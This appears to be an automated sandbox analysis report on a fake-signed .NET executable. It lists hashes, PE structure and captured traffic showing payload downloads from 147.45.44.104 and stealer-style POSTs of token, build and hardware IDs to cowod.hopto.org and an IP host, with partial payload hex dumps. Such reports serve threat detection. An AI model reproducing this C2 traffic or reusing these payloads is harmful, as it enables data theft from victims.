Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.989803849260268
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	413'224 bytes
MD5:	77011ba24d1088a963898abc72c6e129
SHA1:	08a84da40cb625471026568b2399538399b44f98
SHA256:	3b914f143432c17ca607ba232ba0122f78096dc04dd7ce3d297ed0036f3b1545
SHA512:	91e07652791eb55cc4684a97daa119cea2608e03b213675b43751aac9682955e6f36dc7b0ebf471778063182312abbc1dfb9925f95c29399daaeac614c933ba6
SSDEEP:	12288:uJ8GsZTOusN+VVrto1ma41z1esugf9xmolEO:uJ8vTOFN+VVZo1ma4B1eQ/met
TLSH:	8A94233125D6DA3EFEE7CC7C9034B827345477072A522B8B343AE2965B71794A6F0878
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@#.f.............................<... ...@....@.. ....................................`................................

Entrypoint:	0x463cee
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F42340 [Wed Sep 25 14:50:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x63c94	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x62800	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x63b5c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x61cf4	0x61e00	0534f0bd37a806169352efcd40567b25	False	0.9940233876117497	data	7.996138391086221	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x5b8	0x600	c5e8314566f7a5f7708391414f4a9092	False	0.4368489583333333	data	4.114126439113982	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	a9b332d968f232dba11fe8f8f6bc79d9	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x324	data			0.4552238805970149
RT_MANIFEST	0x643c8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 18:00:19.488035917 CEST	59939	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:00:19.495368004 CEST	53	59939	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:03.793991089 CEST	50870	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:03.834270954 CEST	53	50870	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:05.561988115 CEST	58693	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:05.572271109 CEST	53	58693	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:08.876715899 CEST	58443	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:08.885792971 CEST	53	58443	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:09.925951004 CEST	60755	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:09.947937012 CEST	53	60755	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:11.566576004 CEST	63091	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:11.587251902 CEST	53	63091	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:12.729635000 CEST	64788	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:12.749716997 CEST	53	64788	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:14.967287064 CEST	64089	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:14.986993074 CEST	53	64089	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:16.402774096 CEST	56030	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:16.419743061 CEST	53	56030	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:18.952137947 CEST	61898	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:18.968301058 CEST	53	61898	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:20.016246080 CEST	64263	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:20.196006060 CEST	53	64263	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:21.617466927 CEST	61600	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:21.631309986 CEST	53	61600	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:22.741168976 CEST	54176	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:22.911936998 CEST	53	54176	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:24.870111942 CEST	51128	53	192.168.2.5	1.1.1.1
Sep 25, 2024 18:01:24.886913061 CEST	53	51128	1.1.1.1	192.168.2.5
Sep 25, 2024 18:01:59.065226078 CEST	53	58017	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:00:59.934683084 CEST	191	OUT	GET /prog/66f424e80b9cc_idsmds.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 25, 2024 18:01:00.632786036 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:01:00 GMT Content-Type: application/octet-stream Content-Length: 26112 Last-Modified: Wed, 25 Sep 2024 14:57:44 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f424e8-6600" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 70 14 f9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 5c 00 00 00 08 00 00 00 00 00 00 be 7b 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 7b 00 00 53 00 00 00 00 80 00 00 86 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELp"0\{ @ `h{S H.text[ \ `.rsrc^@@.relocd@B{HtC7((.s(32{(2{(6\|(46\|(46\|(4RsE%oF`oGF(H(I(+oM%:&(N{oOZ{ rp((Z2{"(=6\|$(46\|((46\|,(46\|4(46\|7(4.(g(+rp(:r/p(;sl<*6\|@(
Sep 25, 2024 18:01:00.632833004 CEST	1236	IN	Data Raw: 34 00 00 0a 2a 36 02 7c 47 00 00 04 03 28 34 00 00 0a 2a 36 02 7c 51 00 00 04 03 28 91 00 00 0a 2a 36 02 7c 54 00 00 04 03 28 91 00 00 0a 2a 36 02 7c 58 00 00 04 03 28 34 00 00 0a 2a 36 02 7c 5d 00 00 04 03 28 34 00 00 0a 2a 13 30 04 00 6e 00 00 Data Ascii: 46\|G(46\|Q(6\|T(6\|X(46\|](40n(s(rpo(sooo o!io"o#(o$+*07(%}}}\|
Sep 25, 2024 18:01:00.632867098 CEST	448	IN	Data Raw: 00 04 7b 0a 00 00 04 28 16 00 00 06 3a 20 01 00 00 02 7b 16 00 00 04 02 7b 17 00 00 04 7b 0a 00 00 04 17 28 3f 00 00 0a 02 7b 17 00 00 04 7b 0a 00 00 04 28 15 00 00 06 02 7b 17 00 00 04 7b 0a 00 00 04 28 18 00 00 06 6f 2d 00 00 0a 13 07 12 07 28 Data Ascii: {(: {{{(?{{({{(o-(0:A%}}\|(+:{\|%}(.{{(o-(0:A%}}\|(+{
Sep 25, 2024 18:01:00.632904053 CEST	1236	IN	Data Raw: fe 06 0a 00 00 06 73 42 00 00 0a 25 80 08 00 00 04 28 43 00 00 0a 0b 02 7b 17 00 00 04 fe 06 0c 00 00 06 73 42 00 00 0a 28 43 00 00 0a 0c 02 7b 17 00 00 04 fe 06 0d 00 00 06 73 42 00 00 0a 28 43 00 00 0a 0d 19 8d 02 00 00 01 25 16 07 a2 25 17 08 Data Ascii: sB%(C{sB(C{sB(C%%%(Do-(0:A%}}\|(+f{\|%}(.#}}\|(2}}\|
Sep 25, 2024 18:01:00.632936954 CEST	1236	IN	Data Raw: 7c 24 00 00 04 12 02 02 28 0e 00 00 2b dd 55 00 00 00 02 7b 26 00 00 04 0c 02 7c 26 00 00 04 fe 15 07 00 00 01 02 15 25 0a 7d 23 00 00 04 12 02 28 2e 00 00 0a dd 1a 00 00 00 0d 02 1f fe 7d 23 00 00 04 02 7c 24 00 00 04 09 28 32 00 00 0a dd 13 00 Data Ascii: \|$(+U{&\|&%}#(.}#\|$(2}#\|$(310{'9s!{)}{(>9rp(([rp((\rp((`(a(
Sep 25, 2024 18:01:00.632982016 CEST	1236	IN	Data Raw: 1f fe 7d 2b 00 00 04 02 14 7d 2e 00 00 04 02 7c 2c 00 00 04 28 33 00 00 0a 2a 00 41 1c 00 00 00 00 00 00 07 00 00 00 f2 02 00 00 f9 02 00 00 23 00 00 00 31 00 00 01 1b 30 03 00 5d 00 00 00 07 00 00 11 02 7b 35 00 00 04 28 35 00 00 0a 28 17 00 00 Data Ascii: }+}.\|,(3A#10]{5(5(:{5s6%o7%rp(oA(8&8}3\|4(2BB10{69@{8(o-(0:?%}6
Sep 25, 2024 18:01:00.633017063 CEST	672	IN	Data Raw: 05 7d 43 00 00 04 02 7c 40 00 00 04 12 05 02 28 1c 00 00 2b dd ba 01 00 00 02 7b 43 00 00 04 13 05 02 7c 43 00 00 04 fe 15 0b 00 00 1b 02 15 25 0a 7d 3f 00 00 04 12 05 28 7f 00 00 0a 13 04 11 04 28 80 00 00 0a 3a 54 01 00 00 02 73 3c 00 00 06 7d Data Ascii: }C\|@(+{C\|C%}?((:Ts<}A{A(o(5(]}=s}D;O{D{A{=oo-(0:A%}?}E\|@(+{E\|E%}?
Sep 25, 2024 18:01:00.633053064 CEST	892	IN	Data Raw: 06 6f 7d 00 00 0a 13 04 12 04 28 7e 00 00 0a 3a 41 00 00 00 02 17 25 0a 7d 46 00 00 04 02 11 04 7d 49 00 00 04 02 7c 47 00 00 04 12 04 02 28 1e 00 00 2b dd 62 03 00 00 02 7b 49 00 00 04 13 04 02 7c 49 00 00 04 fe 15 0b 00 00 1b 02 15 25 0a 7d 46 Data Ascii: o}(~:A%}F}I\|G(+b{I\|I%}F(}H(9o}(~:A%}F}I\|G(+{I\|I%}F(ss%rp({Hot%rp(ot
Sep 25, 2024 18:01:00.633085966 CEST	1236	IN	Data Raw: 1a 00 00 00 02 1f fe 7d 46 00 00 04 02 14 7d 48 00 00 04 02 7c 47 00 00 04 28 33 00 00 0a 2a 41 34 00 00 02 00 00 00 f0 02 00 00 7a 00 00 00 6a 03 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 df 03 00 00 e6 03 00 00 23 00 00 00 31 00 00 Data Ascii: }F}H\|G(3*A4zj#10{P&9I~<rUp(oo}(~:?%}P}R\|Q(!+{R\|R%}P(ou&((o
Sep 25, 2024 18:01:00.633121967 CEST	1236	IN	Data Raw: 04 00 00 00 3a 00 00 00 97 00 00 00 f4 00 00 00 5f 01 00 00 28 34 00 00 06 6f 2d 00 00 0a 0b 12 01 28 30 00 00 0a 3a 3f 00 00 00 02 16 25 0a 7d 5c 00 00 04 02 07 7d 5e 00 00 04 02 7c 5d 00 00 04 12 01 02 28 26 00 00 2b dd 67 01 00 00 02 7b 5e 00 Data Ascii: :_(4o-(0:?%}\}^\|](&+g{^\|^%}\(.(6o-(0:?%}\}^\|](&+{^\|^%}\(.(5o-(0:?%}\}^
Sep 25, 2024 18:01:00.638093948 CEST	1236	IN	Data Raw: 00 20 05 00 00 05 00 07 00 08 00 03 01 10 00 7a 00 00 00 05 00 09 00 0b 00 03 01 10 00 ab 03 00 00 11 00 0b 00 0e 00 03 01 10 00 cd 03 00 00 11 00 0f 00 10 00 03 01 10 00 21 04 00 00 11 00 12 00 12 00 00 00 10 00 b5 04 02 05 05 00 19 00 14 00 03 Data Ascii: z!-!B#R"'#)Y'++-=3/61:3
Sep 25, 2024 18:01:03.072715998 CEST	192	OUT	GET /prog/66f4247d51812_lfdsjna.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 25, 2024 18:01:03.257937908 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:01:03 GMT Content-Type: application/octet-stream Content-Length: 377384 Last-Modified: Wed, 25 Sep 2024 14:55:57 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f4247d-5c228" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 76 23 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 92 05 00 00 08 00 00 00 00 00 00 ee b0 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 b0 05 00 57 00 00 00 00 c0 05 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 9c 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 5c af 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELv#f @ `W(&\ H.text `.rsrc@@.reloc@BHM\=S!}St&Pi@2^-4N^IGXC:,<JI{y]cf4sO);xozdi0a4YZyR7U8fdL*eq71CWBmKL$f'O6,-Bh(l}H7$$qyb@g@B[1+sIrZodd]X6fH=#5Xe!U]}#Ov

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:01:05.581626892 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Sep 25, 2024 18:01:06.050704956 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:01:06 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c8c3b1c7df443ec-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Sep 25, 2024 18:01:06.265398026 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:01:06 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c8c3b1c7df443ec-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:01:07.135339975 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Sep 25, 2024 18:01:07.597520113 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:01:07 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c8c3b261b014294-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:01:09.220807076 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 3229 Connection: Keep-Alive Cache-Control: no-cache
Sep 25, 2024 18:01:09.225378990 CEST	3229	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 33 39 66 30 65 Data Ascii: ------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="token"439f0e0a3a749bfbbd57a3bb2fdbeb34------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------HDAKJDHIEBFIID

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:20 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:20 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 25 Sep 2024 16:00:20 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=aec22d50b62c4cbda19dc14c; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-25 16:00:20 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-25 16:00:20 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-25 16:00:20 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-25 16:00:20 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:21 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 16:00:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:24 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:24 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 36 41 30 34 32 43 42 43 39 33 33 31 35 38 38 32 31 30 39 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 